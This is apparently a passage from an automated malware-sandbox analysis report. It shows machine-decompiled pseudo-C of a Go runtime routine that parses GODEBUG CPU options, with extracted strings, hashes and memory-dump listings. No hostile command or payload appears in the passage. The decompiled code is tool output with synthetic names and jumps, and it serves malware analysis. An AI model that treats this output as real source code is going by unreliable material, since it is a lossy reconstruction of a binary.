                                                                                                                            • String ID: value=connectconsolecpuproffloat32float64forcegcgctracehead = invalidminpc= pacer: panic: runningsyscalluintptrunknownwaiting bytes, etypes is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= packed= pointer stack=[ status AcceptExArmenianBaline$ pc= sp: sp=) = ) m=+Inf-Inf: p=ACDTACSTAEDTAESTAKDTAKSTAWSTAhomCESTChamDashEESTGOGCLEAFLisuMiaoModiNZDTNZSTNewaSASTThaim=] = ] n=allgallpavx2basebindbmi1bmi2boolcas1cas2cas3cas4cas5cas6chandeadermsfilefuncidleint8itabkindpipeprofrootsbrksse3tcp4trueudp4uint$ tab= top=+0330+0430+0530+0545+0630+0845+1030+1245+1345, fp:-0930AdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicSTermTakriTamil] = (arrayclosedeferfalsefaultgFreegcinggscanhchaninit int16int32int64mheapntohspanicscav schedsleepslicesse41$ targetpc= throwing= until pc=, bound = , limit = /dev/stdinBad varintCancelIoExChorasmianCreatePipeDeprecatedDevanagariDnsQuery_WException GC forcedGOMAXPROCSGetIfEntryGetVersionGlagoliticKharoshthiLockFileExManichaeanOld_ItalicOld_PermicOld_TurkicOther_Math$invalid runtime symbol tablemheap.freeSpanLocked - span missing stack in shrinkstackmspan.sweep: m is not lockednewproc1: new g is not Gdeadnewproc1: newg missing stackos: process already finishedprotocol driver not attachedregion exceeds uintptr rangeruntime.$no module datano such devicepollCache.lockprotocol errorruntime: full=s.allocCount= semaRoot queuestack overflowstopm spinningstore64 failedsync.Cond.Waittext file busytoo many linkstoo many usersunexpected EOFunsafe.Pointerwinapi error #work.full != 0 with G$runtime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime: unblock on closing polldescruntime: wrong goroutine in newstackuncachin$runtime: no module data for save on system g not allowedunreserving unaligned regionCentral America Standard TimeCentral Pacific Standard TimeChatham Islands Standard TimeDeleteProcThreadAttributeListN. Central Asia Standard TimeNorth Asia East Standard Timead
                                                                                                                            • API String ID: 0-3376721504
                                                                                                                            • Opcode ID: 953b4cdb0b9d85c78a36ca99cba4aa3ec11dcda9dc68052ec3d0c93fa675f07d
                                                                                                                            • Instruction ID: 3db084696a44af80c45534bf2b7b863920faf064a1a088d53a1cdcea2a832428
                                                                                                                            • Opcode Fuzzy Hash: 953b4cdb0b9d85c78a36ca99cba4aa3ec11dcda9dc68052ec3d0c93fa675f07d
                                                                                                                            • Instruction Fuzzy Hash: B5D16732219BC186DB64DF69F88039EB7A5F789B94F548126EB8D43B68CF38D455CB00
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 013010E0 Relevance: 10.3, Strings: 8, Instructions: 308COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 67%
                                                                                                                            			E013010E0(void* __ebx, void* __fp0, signed long long __rax, signed long long __rbx, signed long long __rcx, signed long long __rdx, void* __rsi, long long __rbp, signed long long __r8, void* __r14, signed long long _a8, signed long long _a16) {
				char _v8;
				signed long long _v16;
				long long _v24;
				signed long long _v32;
				signed long long _v40;
				signed long long _v48;
				signed long long _v56;
				signed long long _v64;
				signed long long _v72;
				signed long long _v80;
				signed long long _v88;
				signed long long _v96;
				signed long long _v104;
				signed int _v105;
				void* _t92;
				signed int _t114;
				void* _t121;
				signed int _t126;
				signed int _t127;
				void* _t128;
				void* _t144;
				signed long long _t152;
				signed long long _t154;
				signed long long _t172;
				signed long long _t180;
				long long _t181;
				intOrPtr _t184;
				signed long long _t185;
				signed long long _t187;
				signed long long _t188;
				signed long long _t191;
				signed long long _t193;
				signed long long _t194;
				signed int* _t196;
				signed long long _t197;
				signed long long _t204;
				signed long long _t205;
				signed long long _t206;
				intOrPtr _t207;
				signed long long _t208;
				signed long long _t209;
				signed long long _t212;
				void* _t215;

				L0:
				while(1) {
					L0:
					_t215 = __r14;
					_t204 = __r8;
					_t199 = __rbp;
					_t185 = __rdx;
					_t180 = __rcx;
					_t174 = __rbx;
					_t152 = __rax;
					if( &_v8 <=  *((intOrPtr*)(__r14 + 0x10))) {
						goto L73;
					}
					L1:
					_v8 = __rbp;
					_t199 =  &_v8;
					_a8 = __rax;
					L3:
					while(_t174 != 0) {
						L42:
						while(_t180 < _t174) {
							_t127 =  *(_t152 + _t180) & 0x000000ff;
							if(sil != 0x2c) {
								L41:
								_t180 = _t180 + 1;
								continue;
							}
							L44:
							L6:
							if(_t180 >= 0) {
								L8:
								if(_t180 > _t174) {
									L72:
									_t185 = _t174;
									L01358900();
									goto L73;
								}
								L9:
								_t6 = _t180 + 1; // 0x100000000
								_t197 = _t6;
								if(_t174 < _t197) {
									L71:
									_t152 = _t197;
									L01358980();
									goto L72;
								}
								L10:
								_t174 = _t174 - _t180;
								_t188 = _t174 - 1;
								_t204 = _t188;
								_t197 = (_t197 &  ~_t188 >> 0x0000003f) + _t152;
								L11:
								if(_t180 < 4 ||  *_t152 != 0x2e757063) {
									L2:
									_t152 = _t197;
									_t174 = _t204;
									goto L3;
								} else {
									L13:
									L46:
									while(_t185 < _t180) {
										_t126 =  *(_t152 + _t185) & 0x000000ff;
										if(dil != 0x3d) {
											L45:
											_t185 = _t185 + 1;
											continue;
										}
										L48:
										L15:
										_v56 = _t204;
										_v16 = _t197;
										if(_t185 < 0) {
											L29:
											_v96 = _t180;
											_v32 = _t152;
											E01332340(_t185, _t199, _t215);
											E01332C40(0, _t126, _t127, _t128, 0x138c8d1, _t174, _t199, _t215);
											E01332C40(0, _t126, _t127, _t128, _v32, _v96, _t199, _t215);
											E01332C40(0, _t126, _t127, _t128, 0x13867f9, _v96, _t199, _t215);
											_t92 = L013323C0(_t185, _t199, _t215);
											_t197 = _v16;
											_t204 = _v56;
											goto L2;
										}
										L16:
										if(_t185 > _t180) {
											L70:
											L01358900();
											goto L71;
										}
										L17:
										if(_t185 < 4) {
											L69:
											_t180 = _t185;
											L01358980();
											goto L70;
										}
										L18:
										_t10 = _t185 - 4; // -3
										_t191 = _t10;
										_t206 = _t191;
										_t193 =  ~_t191 >> 0x3f;
										_t126 = _t126 & 0x00000004;
										_t174 = _t152 + _t193;
										_t12 = _t185 + 1; // 0x2
										_t208 = _t12;
										if(_t180 < _t208) {
											L68:
											L01358980();
											goto L69;
										}
										L19:
										_v64 = _t206;
										_v40 = _t174;
										_t180 = _t180 - _t185;
										_t209 = _t180 - 1;
										_v104 = _t209;
										_t208 = _t208 &  ~_t209 >> 0x0000003f;
										_t212 = _t152 + _t208;
										_v48 = _t212;
										if(_t180 != 3) {
											L21:
											if(_t180 != 4) {
												L28:
												E01332340(_t185, _t199, _t215);
												E01332C40(0, _t126, _t127, _t128, 0x1388720, _t174, _t199, _t215);
												E01332C40(0, _t126, _t127, _t128, _v48, _v104, _t199, _t215);
												E01332C40(0, _t126, _t127, _t128, 0x138c5b1, _v104, _t199, _t215);
												E01332C40(0, _t126, _t127, _t128, _v40, _v64, _t199, _t215);
												_t121 = 2;
												E01332C40(0, _t126, _t127, _t128, 0x13867f9, _v64, _t199, _t215);
												_t92 = L013323C0(_t185, _t199, _t215);
												_t197 = _v16;
												_t204 = _v56;
												goto L2;
											}
											L22:
											r13d =  *(_t152 + _t208) & 0x0000ffff;
											if (r13w != 0x666f) goto L28;
											r10d =  *(_t152 + _t208 + 2) & 0x000000ff;
											if(r10b != 0x66) {
												goto L28;
											}
											L23:
											L24:
											r10b = _t144 == 0;
											if(_t185 != 7) {
												L27:
												_v105 = r10b;
												_t185 =  *0x147b4e8; // 0xf
												_v72 = _t185;
												_t92 = 0;
												L50:
												while(_t152 < _t185) {
													_t194 =  *0x147b4e0; // 0xc000000000
													_t180 =  *0x147b4e8; // 0xf
													asm("o16 nop [eax+eax]");
													if(_t152 >= _t180) {
														L61:
														E013588C0();
														L62:
														 *(_t206 + _t152 + 0x19) = r10b;
														_t85 = _t212 + 1; // 0x2
														_t152 = _t85;
														L63:
														if(_t152 >= _t194) {
															goto L2;
														}
														L64:
														_t184 =  *0x147b4e8; // 0xf
														_t207 =  *0x147b4e0; // 0xc000000000
														if(_t152 >= _t184) {
															L67:
															E013588C0();
															goto L68;
														}
														L65:
														_t212 = _t152;
														_t152 = _t152 << 5;
														 *((char*)(_t207 + _t152 + 0x18)) = 1;
														_t180 =  *0x147b4e8; // 0xf
														_t206 =  *0x147b4e0; // 0xc000000000
														if(_t212 < _t180) {
															goto L62;
														}
														L66:
														E013588C0();
														goto L67;
													}
													L52:
													_t212 = _t152;
													_t172 = _t152 << 5;
													_t59 = _t172 + 8; // 0x3
													_t180 =  *((intOrPtr*)(_t194 + _t59));
													_t194 =  *((intOrPtr*)(_t194 + _t172));
													if(_t180 != _t206) {
														L49:
														_t57 = _t212 + 1; // 0x1
														_t152 = _t57;
														continue;
													}
													L53:
													_v80 = _t172;
													_v88 = _t212;
													_t92 = E013021C0(_t92, _t121, 0, 0, _t194, _t174, _t180);
													if(_t92 != 0) {
														L55:
														_t180 =  *0x147b4e8; // 0xf
														_t197 =  *0x147b4e0; // 0xc000000000
														_t152 = _v88;
														if(_t152 >= _t180) {
															L60:
															E013588C0();
															goto L61;
														}
														L56:
														_t194 = _v80;
														 *((char*)(_t197 + _t194 + 0x18)) = 1;
														_t180 =  *0x147b4e8; // 0xf
														_t197 =  *0x147b4e0; // 0xc000000000
														if(_t152 >= _t180) {
															L59:
															E013588C0();
															goto L60;
														}
														L57:
														r9d = _v105 & 0x000000ff;
														 *((intOrPtr*)(_t197 + _t194 + 0x19)) = r9b;
														_t197 = _v16;
														_t204 = _v56;
														goto L2;
													}
													L54:
													_t185 = _v72;
													_t174 = _v40;
													_t197 = _v16;
													_t204 = _v56;
													_t206 = _v64;
													r10d = _v105 & 0x000000ff;
													_t212 = _v88;
													goto L49;
												}
												E01332340(_t185, _t199, _t215);
												E01332C40(0, _t126, _t127, _t128, 0x138c010, _t174, _t199, _t215);
												E01332C40(0, _t126, _t127, _t128, _v40, _v64, _t199, _t215);
												_t121 = 2;
												E01332C40(0, _t126, _t127, _t128, 0x13867f9, _v64, _t199, _t215);
												_t92 = L013323C0(_t185, _t199, _t215);
												_t197 = _v16;
												_t204 = _v56;
												goto L2;
											}
											L25:
											r11d =  *(_t152 + _t193) & 0x0000ffff;
											if (r11w != 0x6c61) goto L27;
											_t126 =  *(_t152 + _t193 + 2) & 0x000000ff;
											if(dil != 0x6c) {
												goto L27;
											}
											L26:
											_t194 =  *0x147b4e8; // 0xf
											_t92 = 0;
											goto L63;
										}
										L20:
										r10d =  *(_t152 + _t208) & 0x0000ffff;
										if (r10w != 0x6e6f) goto L28;
										_t144 = _t180 - 3;
										goto L24;
									}
									_t185 = 0xffffffff;
									goto L15;
								}
							}
							L7:
							r8d = 0;
							_t127 = 0;
							_t180 = _t174;
							goto L11;
						}
						_t180 = 0xffffffff;
						goto L6;
					}
					_t154 =  *0x147b4e8; // 0xf
					_t181 =  *0x147b4e0; // 0xc000000000
					if(_t154 == 0) {
						L32:
						return _t92;
					}
					L31:
					_v56 = _t154;
					while(1) {
						L34:
						_t42 = _t181 + 0x19; // 0xf000000000000000
						_t114 =  *_t42 & 0x000000ff;
						_t43 = _t181 + 0x10; // 0x14cfae1
						_t196 =  *_t43;
						_t187 =  *_t181;
						_t44 = _t181 + 8; // 0x3
						_t205 =  *_t44;
						if( *((char*)(_t181 + 0x18)) != 0) {
							if(_t114 == 0 ||  *_t196 != 0) {
								 *_t196 = _t114;
							} else {
								_v64 = _t205;
								_v16 = _t187;
								_v72 = _t185;
								_v24 = _t181;
								E01332340(_t185, _t199, _t215);
								E01332C40(0, _t126, _t127, _t128, 0x138acee, _t174, _t199, _t215);
								_t174 = _v64;
								E01332C40(0, _t126, _t127, _t128, _v16, _v64, _t199, _t215);
								E01332C40(0, _t126, _t127, _t128, 0x138a600, _v64, _t199, _t215);
								_t92 = L013323C0(_t185, _t199, _t215);
								_t154 = _v56;
								_t181 = _v24;
								_t185 = _v72;
							}
						}
						_t185 = _t185 + 1;
						if(_t154 <= _t185) {
							break;
						}
						L33:
						_t181 = _t181 + 0x20;
					}
					L40:
					goto L32;
					L73:
					_a8 = _t152;
					_a16 = _t174;
					E01356200(_t185, _t199);
				}
			}














































                                                                                                                            0x013010e0
                                                                                                                            0x013010e0
                                                                                                                            0x013010e0
                                                                                                                            0x013010e0
                                                                                                                            0x013010e0
                                                                                                                            0x013010e0
                                                                                                                            0x013010e0
                                                                                                                            0x013010e0
                                                                                                                            0x013010e0
                                                                                                                            0x013010e0
                                                                                                                            0x013010e9
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x013010ef
                                                                                                                            0x013010f6
                                                                                                                            0x013010fe
                                                                                                                            0x01301106
                                                                                                                            0x00000000
                                                                                                                            0x01301116
                                                                                                                            0x00000000
                                                                                                                            0x01301420
                                                                                                                            0x01301429
                                                                                                                            0x01301431
                                                                                                                            0x01301415
                                                                                                                            0x01301415
                                                                                                                            0x00000000
                                                                                                                            0x01301415
                                                                                                                            0x01301433
                                                                                                                            0x0130112d
                                                                                                                            0x01301130
                                                                                                                            0x01301140
                                                                                                                            0x01301143
                                                                                                                            0x01301610
                                                                                                                            0x01301610
                                                                                                                            0x01301613
                                                                                                                            0x00000000
                                                                                                                            0x01301613
                                                                                                                            0x01301149
                                                                                                                            0x01301149
                                                                                                                            0x01301149
                                                                                                                            0x01301150
                                                                                                                            0x01301605
                                                                                                                            0x01301605
                                                                                                                            0x0130160b
                                                                                                                            0x00000000
                                                                                                                            0x0130160b
                                                                                                                            0x01301156
                                                                                                                            0x01301156
                                                                                                                            0x01301159
                                                                                                                            0x0130115d
                                                                                                                            0x0130116a
                                                                                                                            0x0130116d
                                                                                                                            0x01301171
                                                                                                                            0x01301110
                                                                                                                            0x01301110
                                                                                                                            0x01301113
                                                                                                                            0x00000000
                                                                                                                            0x0130117b
                                                                                                                            0x0130117b
                                                                                                                            0x00000000
                                                                                                                            0x01301440
                                                                                                                            0x01301449
                                                                                                                            0x01301451
                                                                                                                            0x01301438
                                                                                                                            0x01301438
                                                                                                                            0x00000000
                                                                                                                            0x01301438
                                                                                                                            0x01301453
                                                                                                                            0x0130118c
                                                                                                                            0x0130118c
                                                                                                                            0x01301191
                                                                                                                            0x01301199
                                                                                                                            0x013012f9
                                                                                                                            0x013012f9
                                                                                                                            0x013012fe
                                                                                                                            0x01301303
                                                                                                                            0x01301314
                                                                                                                            0x01301323
                                                                                                                            0x01301334
                                                                                                                            0x01301339
                                                                                                                            0x0130133e
                                                                                                                            0x01301343
                                                                                                                            0x00000000
                                                                                                                            0x01301343
                                                                                                                            0x013011a0
                                                                                                                            0x013011a3
                                                                                                                            0x013015f2
                                                                                                                            0x01301600
                                                                                                                            0x00000000
                                                                                                                            0x01301600
                                                                                                                            0x013011a9
                                                                                                                            0x013011ad
                                                                                                                            0x013015e5
                                                                                                                            0x013015ea
                                                                                                                            0x013015ed
                                                                                                                            0x00000000
                                                                                                                            0x013015ed
                                                                                                                            0x013011b3
                                                                                                                            0x013011b3
                                                                                                                            0x013011b3
                                                                                                                            0x013011b7
                                                                                                                            0x013011bd
                                                                                                                            0x013011c1
                                                                                                                            0x013011c4
                                                                                                                            0x013011c8
                                                                                                                            0x013011c8
                                                                                                                            0x013011cf
                                                                                                                            0x013015dc
                                                                                                                            0x013015e0
                                                                                                                            0x00000000
                                                                                                                            0x013015e0
                                                                                                                            0x013011d5
                                                                                                                            0x013011d5
                                                                                                                            0x013011da
                                                                                                                            0x013011df
                                                                                                                            0x013011e2
                                                                                                                            0x013011e6
                                                                                                                            0x013011f5
                                                                                                                            0x013011f8
                                                                                                                            0x013011fc
                                                                                                                            0x01301205
                                                                                                                            0x01301220
                                                                                                                            0x01301224
                                                                                                                            0x0130128c
                                                                                                                            0x0130128c
                                                                                                                            0x013012a0
                                                                                                                            0x013012af
                                                                                                                            0x013012c0
                                                                                                                            0x013012cf
                                                                                                                            0x013012db
                                                                                                                            0x013012e0
                                                                                                                            0x013012e5
                                                                                                                            0x013012ea
                                                                                                                            0x013012ef
                                                                                                                            0x00000000
                                                                                                                            0x013012ef
                                                                                                                            0x01301226
                                                                                                                            0x01301226
                                                                                                                            0x01301231
                                                                                                                            0x01301233
                                                                                                                            0x0130123d
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0130123f
                                                                                                                            0x01301243
                                                                                                                            0x01301243
                                                                                                                            0x0130124b
                                                                                                                            0x01301274
                                                                                                                            0x01301274
                                                                                                                            0x01301279
                                                                                                                            0x01301280
                                                                                                                            0x01301285
                                                                                                                            0x00000000
                                                                                                                            0x01301460
                                                                                                                            0x01301469
                                                                                                                            0x01301470
                                                                                                                            0x01301477
                                                                                                                            0x01301483
                                                                                                                            0x01301585
                                                                                                                            0x01301585
                                                                                                                            0x0130158a
                                                                                                                            0x0130158a
                                                                                                                            0x0130158f
                                                                                                                            0x0130158f
                                                                                                                            0x01301593
                                                                                                                            0x01301596
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0130159c
                                                                                                                            0x0130159c
                                                                                                                            0x013015a3
                                                                                                                            0x013015ad
                                                                                                                            0x013015d7
                                                                                                                            0x013015d7
                                                                                                                            0x00000000
                                                                                                                            0x013015d7
                                                                                                                            0x013015af
                                                                                                                            0x013015af
                                                                                                                            0x013015b2
                                                                                                                            0x013015b6
                                                                                                                            0x013015bc
                                                                                                                            0x013015c3
                                                                                                                            0x013015cd
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x013015cf
                                                                                                                            0x013015d2
                                                                                                                            0x00000000
                                                                                                                            0x013015d2
                                                                                                                            0x01301489
                                                                                                                            0x01301489
                                                                                                                            0x0130148c
                                                                                                                            0x01301490
                                                                                                                            0x01301490
                                                                                                                            0x01301495
                                                                                                                            0x0130149c
                                                                                                                            0x01301458
                                                                                                                            0x01301458
                                                                                                                            0x01301458
                                                                                                                            0x00000000
                                                                                                                            0x01301458
                                                                                                                            0x0130149e
                                                                                                                            0x0130149e
                                                                                                                            0x013014a3
                                                                                                                            0x013014ab
                                                                                                                            0x013014b2
                                                                                                                            0x013014dd
                                                                                                                            0x013014dd
                                                                                                                            0x013014e4
                                                                                                                            0x013014eb
                                                                                                                            0x013014f3
                                                                                                                            0x01301580
                                                                                                                            0x01301580
                                                                                                                            0x00000000
                                                                                                                            0x01301580
                                                                                                                            0x013014f9
                                                                                                                            0x013014f9
                                                                                                                            0x013014fe
                                                                                                                            0x01301503
                                                                                                                            0x0130150a
                                                                                                                            0x01301514
                                                                                                                            0x0130157a
                                                                                                                            0x0130157a
                                                                                                                            0x00000000
                                                                                                                            0x0130157a
                                                                                                                            0x01301516
                                                                                                                            0x01301516
                                                                                                                            0x0130151c
                                                                                                                            0x01301521
                                                                                                                            0x01301526
                                                                                                                            0x00000000
                                                                                                                            0x01301526
                                                                                                                            0x013014b4
                                                                                                                            0x013014b4
                                                                                                                            0x013014b9
                                                                                                                            0x013014be
                                                                                                                            0x013014c3
                                                                                                                            0x013014c8
                                                                                                                            0x013014cd
                                                                                                                            0x013014d3
                                                                                                                            0x00000000
                                                                                                                            0x013014d3
                                                                                                                            0x01301530
                                                                                                                            0x01301541
                                                                                                                            0x01301550
                                                                                                                            0x0130155c
                                                                                                                            0x01301561
                                                                                                                            0x01301566
                                                                                                                            0x0130156b
                                                                                                                            0x01301570
                                                                                                                            0x00000000
                                                                                                                            0x01301570
                                                                                                                            0x0130124d
                                                                                                                            0x0130124d
                                                                                                                            0x01301258
                                                                                                                            0x0130125a
                                                                                                                            0x01301264
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x01301266
                                                                                                                            0x01301266
                                                                                                                            0x0130126d
                                                                                                                            0x00000000
                                                                                                                            0x0130126d
                                                                                                                            0x01301207
                                                                                                                            0x01301207
                                                                                                                            0x01301212
                                                                                                                            0x01301214
                                                                                                                            0x00000000
                                                                                                                            0x01301214
                                                                                                                            0x01301185
                                                                                                                            0x00000000
                                                                                                                            0x01301185
                                                                                                                            0x01301171
                                                                                                                            0x01301132
                                                                                                                            0x01301132
                                                                                                                            0x01301135
                                                                                                                            0x01301137
                                                                                                                            0x00000000
                                                                                                                            0x01301137
                                                                                                                            0x01301126
                                                                                                                            0x00000000
                                                                                                                            0x01301126
                                                                                                                            0x0130134d
                                                                                                                            0x01301354
                                                                                                                            0x01301363
                                                                                                                            0x0130136e
                                                                                                                            0x0130137d
                                                                                                                            0x0130137d
                                                                                                                            0x01301365
                                                                                                                            0x01301365
                                                                                                                            0x01301382
                                                                                                                            0x01301382
                                                                                                                            0x01301382
                                                                                                                            0x01301382
                                                                                                                            0x01301386
                                                                                                                            0x01301386
                                                                                                                            0x0130138a
                                                                                                                            0x0130138d
                                                                                                                            0x0130138d
                                                                                                                            0x01301395
                                                                                                                            0x01301399
                                                                                                                            0x01301402
                                                                                                                            0x013013a2
                                                                                                                            0x013013a2
                                                                                                                            0x013013a7
                                                                                                                            0x013013ac
                                                                                                                            0x013013b1
                                                                                                                            0x013013b6
                                                                                                                            0x013013c7
                                                                                                                            0x013013d1
                                                                                                                            0x013013d6
                                                                                                                            0x013013e7
                                                                                                                            0x013013ec
                                                                                                                            0x013013f1
                                                                                                                            0x013013f6
                                                                                                                            0x013013fb
                                                                                                                            0x013013fb
                                                                                                                            0x01301399
                                                                                                                            0x01301404
                                                                                                                            0x0130140a
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0130137e
                                                                                                                            0x0130137e
                                                                                                                            0x0130137e
                                                                                                                            0x01301410
                                                                                                                            0x00000000
                                                                                                                            0x01301619
                                                                                                                            0x01301619
                                                                                                                            0x0130161e
                                                                                                                            0x01301623
                                                                                                                            0x0130162d

                                                                                                                            Strings
                                                                                                                            • " ][]i)msnss us} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...???ADTASTBSTCATCDTCETCSTEATEDTEETEOFESTGMTHDTHSTHanIDTISTJSTKSTLaoMDTMSKMSTMroNDTNSTNaNNkoPC=PDTPKTPSTUTCVaiWAT]:adxaesavxendfinf, xrefs: 013012D4, 01301328, 01301555
                                                                                                                            • GODEBUG: unknown cpu feature "Pacific Standard Time (Mexico)Turks And Caicos Standard Timeabi mismatch detected between assignment to entry in nil mapcheckdead: inconsistent countsfailed to get system page sizefreedefer with d._panic != nilinappropriate ioctl , xrefs: 01301535
                                                                                                                            • cpu., xrefs: 01301173
                                                                                                                            • GODEBUG: can not enable "GetFinalPathNameByHandleWGetQueuedCompletionStatusKaliningrad Standard TimeMiddle East Standard TimeNew Zealand Standard TimeNorth Korea Standard TimeTransbaikal Standard TimeUS Mountain Standard TimeUlaanbaatar Standard TimeUpdateProc, xrefs: 013013BB
                                                                                                                            • " not supported for cpu option "crypto/aes: input not full blockend outside usable address spacenumerical argument out of domainpanic while printing panic valueremovespecial on invalid pointerresource temporarily unavailableruntime.semasleep wait_abandonedrunt, xrefs: 013012B4
                                                                                                                            • GODEBUG: value "GetComputerNameWGetCurrentThreadGetFullPathNameWGetLongPathNameWImperial_AramaicMeroitic_CursiveNetApiBufferFreeOpenProcessTokenOther_AlphabeticRegQueryInfoKeyWRegQueryValueExWRemoveDirectoryWSetFilePointerExTerminateProcessZanabazar_Squarerun, xrefs: 01301291
                                                                                                                            • GODEBUG: no value specified for "InitializeProcThreadAttributeListbase outside usable address spaceconcurrent map read and map writecrypto/aes: output not full blockfindrunnable: negative nmspinningfreeing stack not in a stack spanheapBitsSetType: unexpected s, xrefs: 01301308
                                                                                                                            • ", missing CPU supportchan receive (nil chan)close of closed channeldevice or resource busyfatal: morestack on g0garbage collection scangcDrain phase incorrectindex out of range [%x]interrupted system callinvalid m->lockedInt = left over markroot jobsmakecha, xrefs: 013013DB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.703513373.0000000001301000.00000020.00000001.01000000.00000004.sdmp, Offset: 01300000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.703502515.0000000001300000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.703892330.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704809118.0000000001465000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704826575.0000000001469000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704834362.000000000146A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704840295.000000000146B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704882959.0000000001479000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704900694.00000000014A1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704911959.00000000014A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704927411.00000000014CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704938861.00000000014D2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704948400.00000000014D5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.704984644.00000000014F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705053337.000000000153F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.705062638.0000000001540000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1300000_????????????.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: " ][]i)msnss us} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...???ADTASTBSTCATCDTCETCSTEATEDTEETEOFESTGMTHDTHSTHanIDTISTJSTKSTLaoMDTMSKMSTMroNDTNSTNaNNkoPC=PDTPKTPSTUTCVaiWAT]:adxaesavxendfinf$" not supported for cpu option "crypto/aes: input not full blockend outside usable address spacenumerical argument out of domainpanic while printing panic valueremovespecial on invalid pointerresource temporarily unavailableruntime.semasleep wait_abandonedrunt$", missing CPU supportchan receive (nil chan)close of closed channeldevice or resource busyfatal: morestack on g0garbage collection scangcDrain phase incorrectindex out of range [%x]interrupted system callinvalid m->lockedInt = left over markroot jobsmakecha$GODEBUG: can not enable "GetFinalPathNameByHandleWGetQueuedCompletionStatusKaliningrad Standard TimeMiddle East Standard TimeNew Zealand Standard TimeNorth Korea Standard TimeTransbaikal Standard TimeUS Mountain Standard TimeUlaanbaatar Standard TimeUpdateProc$GODEBUG: no value specified for "InitializeProcThreadAttributeListbase outside usable address spaceconcurrent map read and map writecrypto/aes: output not full blockfindrunnable: negative nmspinningfreeing stack not in a stack spanheapBitsSetType: unexpected s$GODEBUG: unknown cpu feature "Pacific Standard Time (Mexico)Turks And Caicos Standard Timeabi mismatch detected between assignment to entry in nil mapcheckdead: inconsistent countsfailed to get system page sizefreedefer with d._panic != nilinappropriate ioctl $GODEBUG: value "GetComputerNameWGetCurrentThreadGetFullPathNameWGetLongPathNameWImperial_AramaicMeroitic_CursiveNetApiBufferFreeOpenProcessTokenOther_AlphabeticRegQueryInfoKeyWRegQueryValueExWRemoveDirectoryWSetFilePointerExTerminateProcessZanabazar_Squarerun$cpu.
                                                                                                                            • API String ID: 0-665398544
                                                                                                                            • Opcode ID: ce62b8b79b2730c21a49227175eeb11c328e4f670fb8375f3d0da92049fce42b
                                                                                                                            • Instruction ID: 654b61529c6d19a43a80fa1b97721dc917999fbe8a492eeb7968d536d2aff3b3
                                                                                                                            • Opcode Fuzzy Hash: ce62b8b79b2730c21a49227175eeb11c328e4f670fb8375f3d0da92049fce42b
                                                                                                                            • Instruction Fuzzy Hash: 01C1B276308B85C1DF16DB69E45039AABA5F389BD8F484522EF8E07BA5DF78C481C710
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0000025BF8ACB610 Relevance: 9.3, APIs: 6, Instructions: 257COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.708528999.0000025BF8AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000025BF8AB0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_25bf8ab0000_????????????.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _errno$_filbuf_fileno_getptd_noexit_invalid_parameter_noinfomemcpy_s
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2328795619-0
                                                                                                                            • Opcode ID: 8ae9ed08b13ba4ada5ec926fa5856a0368a7c2d79885a6854ff75b2d8ccebf79
                                                                                                                            • Instruction ID: 0ad4f945ed8539983ad086ff95364435bcd9f04e25b16c6f0d02187b61245009
                                                                                                                            • Opcode Fuzzy Hash: 8ae9ed08b13ba4ada5ec926fa5856a0368a7c2d79885a6854ff75b2d8ccebf79
                                                                                                                            • Instruction Fuzzy Hash: 9161B132218E254AEA69962C8C4E37672C1E796732F34032EF456C3AF1DB72D85346D9
                                                                                                                            Uniqueness

